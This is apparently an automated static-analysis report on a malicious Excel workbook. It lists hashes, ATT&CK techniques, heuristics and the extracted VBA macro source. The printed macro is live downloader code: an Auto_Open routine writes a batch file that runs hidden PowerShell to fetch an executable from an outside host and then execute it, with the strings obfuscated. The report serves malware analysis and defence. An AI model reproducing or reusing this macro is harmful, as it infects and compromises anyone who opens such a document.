Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0f1bbab62e5ad84e…

MALICIOUS

Office (OOXML)

13.6 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-11-21
MD5: 3745942da06cf4f479fd0843480afe6e SHA-1: 0a4568a2ae442ea0cdcd69b87d835ed2a7bcea02 SHA-256: 0f1bbab62e5ad84e2fad5870e57a8b3abd58871a28d587b5459aa3d6f1a60a65
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The VBA macro contains an Auto_Open subroutine that executes when the document is opened. This subroutine constructs a batch file named 'god.bat' in the public documents directory. The batch file is written to download and execute a second-stage payload from the URL 'https://official01.my03.com/w/ConsoleApp5.exe', saving it as 'usnew.exe'. The macro then attempts to execute the downloaded file.

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1193 bytes
SHA-256: c98eb51ff78b1126e5d571a2e56389b55e0efa4b3b59c6abeac94947075e713b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Workbook______________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Worksheet______1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub auto_Open()
shareboard = "powers"
glassafter = "hell"
Set sixless = GetObject("new:0D43FE01-F093-11CF-8940-00A0C905422" & CInt(7.6))
spe = "C:\Users\Public\Documents\god.bat"
Set sixless2 = sixless.CreateTextFile(spe)
sixless2.WriteLine shareboard & glassafter & " -w hi ;iwr -uri htt`ps://official01.my03.com/w/ConsoleApp5.e`xe -outfile C:\Users\Public\Documents\usnew.e`xe;C:\Users\Public\Documents\usnew.e`xe"
sixless2.Close
GetObject("new:13709620-C279-11CE-A49E-44455354000" & CInt(0.3)).Open (spec)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 17920 bytes
SHA-256: cc6979b9e4ab07a811d16fd9938d041b67b6ca323f70ca2520268cdd9cabbd48

Open this report in the interactive analyzer, or submit your own file for analysis.